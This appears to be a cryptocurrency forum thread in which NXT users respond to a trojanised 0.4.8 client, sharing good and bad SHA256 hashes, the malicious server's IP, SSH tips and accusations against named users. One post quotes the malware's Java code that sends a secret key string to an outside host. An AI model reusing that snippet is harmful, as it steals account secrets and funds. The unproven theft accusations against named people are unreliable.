NXT :: descendant of Bitcoin - Updated Information

[opticalcarrier]

opticalc, QBTC ---

WHY does nxtcrypto.org's download page point to https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI

..instead of http://info.nxtcrypto.org/client.zip ...

... and WHY are the hases not published alongside the download link?

I dont run the www site.  QBTC over at nextcoin.org runs the WWW site.  I will hit her up to fix that ASAP.
(remember, Im really just running DNS here, and trying to coordinate between all the other sites)

good catch though, definitely need to get her to fix it NOW

[intel]

opticalc, QBTC ---

WHY does nxtcrypto.org's download page point to https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI

..instead of http://info.nxtcrypto.org/client.zip ...

... and WHY are the hases not published alongside the download link?

I dont run the www site.  QBTC over at nextcoin.org runs the WWW site.  I will hit her up to fix that ASAP.
(remember, Im really just running DNS here, and trying to coordinate between all the other sites)

good catch though, definitely need to get her to fix it NOW

In fact 0.4.8 is http://info.nxtcrypto.org/nxt-client-0.4.8.zip

[rickyjames]

So, are most people with the new client boned?

If not, what should you check?

if the sha256 of your nxt-client-0.4.8.zip is:

ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2

you are fine, if it's:

948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06

you should download legit client and transfer your NXT immediately to another account if it's still there

how to get sha256 hash of your file is explained in this thread (nice windows tool here: http://sourceforge.net/projects/quickhash/)

OK, so I've verified I lucked out and got the "good" download completely by chance.  What's this about malware listening at digital ocean?  Can it only get data from the bad clients or all clients?

[swartzfeger]

So, are most people with the new client boned?

If not, what should you check?

Wesleyh, what's the status of the Mac client? I've only downloaded it from the links you've provided in your posts. I guess I shouldn't assume anything is safe.

[newcn]

ok,I find some clues:

the nxt zip file I downloaded(whose sha256 is diff from this thread now)

Code:

creation time:2013‎.‎12‎.‎31‎，‏‎20:31:14
‎modified time:2013‎.‎12‎.‎31，‏‎20:35:16

but in that time period, I only accessed 2 pages, they are all in this thread!!!
one is the first page of this thread!!!!
the second is https://bitcointalk.org/index.php?topic=345619.msg4236250#msg4236250
and I found one link from the second one,it is still there:
http://info.nxtcrypto.org/nxt-client-0.4.8.zip
is it possible that the thief can change the link of this thread?
omg,Its terrible!!!

[kunibopl]

so Drexme once again stole coins by editing the downloadlink, that pointed to EpicThomas' manipulated client?

[EvilDave]

Er...wtf?

Am i missing something?

I think you turned him into a newt, but he got better.

Hmmm...I'm mostly not that evil  

And HappyCoins.nl actually are very good, low fees, fast delivery and u can pay using the Dutch iDeal system. I spit on PayPal.....

Still curious why my name is up in lights all of a sudden

[salsacz]

PaulyC:
the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history, 
the link was http://162.243.246.223/nxt-client-0.4.8.zip
this client is different from what I Just downloaded from this thread:

Code:

 
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2  nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06  nxt-client-0.4.8.zip

please check your browser history to find which page you used for the download - where did you find a link?

how to find it from Chrome?
I just find the link, not the webpage the link was in,
there should be some ways to find that!

ctrl+h

[intel]

So, are most people with the new client boned?

If not, what should you check?

if the sha256 of your nxt-client-0.4.8.zip is:

ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2

you are fine, if it's:

948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06

you should download legit client and transfer your NXT immediately to another account if it's still there

how to get sha256 hash of your file is explained in this thread (nice windows tool here: http://sourceforge.net/projects/quickhash/)

OK, so I've verified I lucked out and got the "good" download completely by chance.  What's this about malware listening at digital ocean?  Can it only get data from the bad clients or all clients?

      if (!paramString.equals(""))
      {
        if (!myKeys.contains(paramString))
        {
          URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
          URLConnection connection = url.openConnection();
          connection.setConnectTimeout(10000);
          connection.getInputStream();
          myKeys.add(paramString);
        }
      }

[opticalcarrier]

can I get some SSH remote command help here?

on a box, I can do lynx -dump http://localhost:7874/nxt?requestType=getPeer\&peer=79.102.159.249
to see the stats for the 79.102.159.249 peer if it is connected.  The results look like this (notice I had to escape the & there):

Code:

{"platform":"?","application":"NRS","weight":0,"state":1,"announcedAddress":"","
downloadedVolume":8758,"version":"0.4.7e","uploadedVolume":12675225}

why can I not use this to do a remote SSH command?

Code:

root@vps1:~# ssh -i .ssh/vps root@vps1 lynx -dump http://localhost:7874/nxt?requestType=getPeer\&peer=79.102.159.249
{"errorCode":3,"errorDescription":"\"peer\" not specified"}
root@vps1:~#

Try:

Code:

ssh root@vps1 -t -C 'curl "http://localhost:7874/nxt?requestType=getPeer&peer=79.102.159.249"'

More eye pleasing.

Code:

curl --silent "http://localhost:7874/nxt?requestType=getPeer&peer=79.102.159.249"  | python -m json.tool

Edit: Added --silent option

very cool thanks a ton guys

[xyzzyx]

Er...wtf?

Am i missing something?

I think you turned him into a newt, but he got better.

Hmmm...I'm mostly not that evil  

And HappyCoins.nl actually are very good, low fees, fast delivery and u can pay using the Dutch iDeal system. I spit on PayPal.....

Still curious why my name is up in lights all of a sudden

I think its a case of mistaken identity as people are a bit excited and a little angry at the moment.  You should go to the Winchester, have a nice cold pint, and wait for all of this to blow over.

[opticalcarrier]

opticalc, QBTC ---

WHY does nxtcrypto.org's download page point to https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI

..instead of http://info.nxtcrypto.org/client.zip ...

... and WHY are the hases not published alongside the download link?

I dont run the www site.  QBTC over at nextcoin.org runs the WWW site.  I will hit her up to fix that ASAP.
(remember, Im really just running DNS here, and trying to coordinate between all the other sites)

good catch though, definitely need to get her to fix it NOW

In fact 0.4.8 is http://info.nxtcrypto.org/nxt-client-0.4.8.zip

Ive already asked her to update the download that is manually mirrored on her www site.

[bidji29]

You can use :

http://hash.online-convert.com/sha256-generator

To check the sha256 of a file on your computer or on the internet.

[intel]

so Drexme once again stole coins by editing the downloadlink, that pointed to EpicThomas' manipulated client?

I contacted Gravaton and asked to remove all dextern posts asap!

[Damelon]

By the way, I just checked and Drexme was last online here two hours ago.
There is a good chance he will try to cash in tonight if he read this thread now that we are on, to him...

[utopianfuture]

People, the malware is being hosted on 162.243.246.223, it is digital ocean, a lot of people here have VPS here.

Contact their support asap and notify that the IP 162.243.246.223 is running a listening backdoor / passlogger.

How does this work ? what type of activities are risky now ?

[intel]

Er...wtf?

Am i missing something?

I think you turned him into a newt, but he got better.

Hmmm...I'm mostly not that evil  

And HappyCoins.nl actually are very good, low fees, fast delivery and u can pay using the Dutch iDeal system. I spit on PayPal.....

Still curious why my name is up in lights all of a sudden

According to your posts, you also actively "helped" people to understand how they got their funds stolen.

I would call you hacktroll!

One of your messages:

@PaulyC :

Have u scanned yr PC for malware? Trojan/key logger looks like a very good possiblility at this moment.

And how is yr off-line security ? Anyone else have acess to yr PC?

[intel]

People, the malware is being hosted on 162.243.246.223, it is digital ocean, a lot of people here have VPS here.

Contact their support asap and notify that the IP 162.243.246.223 is running a listening backdoor / passlogger.

How does this work ? what type of activities are risky now ?

'

It's still risky to use "patched" NXT Client downloaded from 3rd party dirty places like dextern topic who manipulated the download link to a patched (infected) NXT Client.

[EvilDave]

Er...wtf?

Am i missing something?

I think you turned him into a newt, but he got better.

Hmmm...I'm mostly not that evil  

And HappyCoins.nl actually are very good, low fees, fast delivery and u can pay using the Dutch iDeal system. I spit on PayPal.....

Still curious why my name is up in lights all of a sudden

I think its a case of mistaken identity as people are a bit excited and a little angry at the moment.  You should go to the Winchester, have a nice cold pint, and wait for all of this to blow over.

Good plan, tho' in my case i"d be better off going to bed. Which is where i"m going.....

Checked my SHA256 hash, luckily I got the good client from the nextcoin thread, pays to update late sometimes.

Quick check for the non-evil client is size: 7.173.063 bytes and u are good.

[EvilDave]

Er...wtf?

Am i missing something?

I think you turned him into a newt, but he got better.

Hmmm...I'm mostly not that evil  

And HappyCoins.nl actually are very good, low fees, fast delivery and u can pay using the Dutch iDeal system. I spit on PayPal.....

Still curious why my name is up in lights all of a sudden

According to your posts, you also actively "helped" people to understand how they got their funds stolen.

I would call you hacktroll!

One of your messages:

@PaulyC :

Have u scanned yr PC for malware? Trojan/key logger looks like a very good possiblility at this moment.

And how is yr off-line security ? Anyone else have acess to yr PC?

I don't see the problem, seems like a reasonable question.

Me not hacktroll, anyway.

I call u a silly person and wave my genitals in the face of your aunties....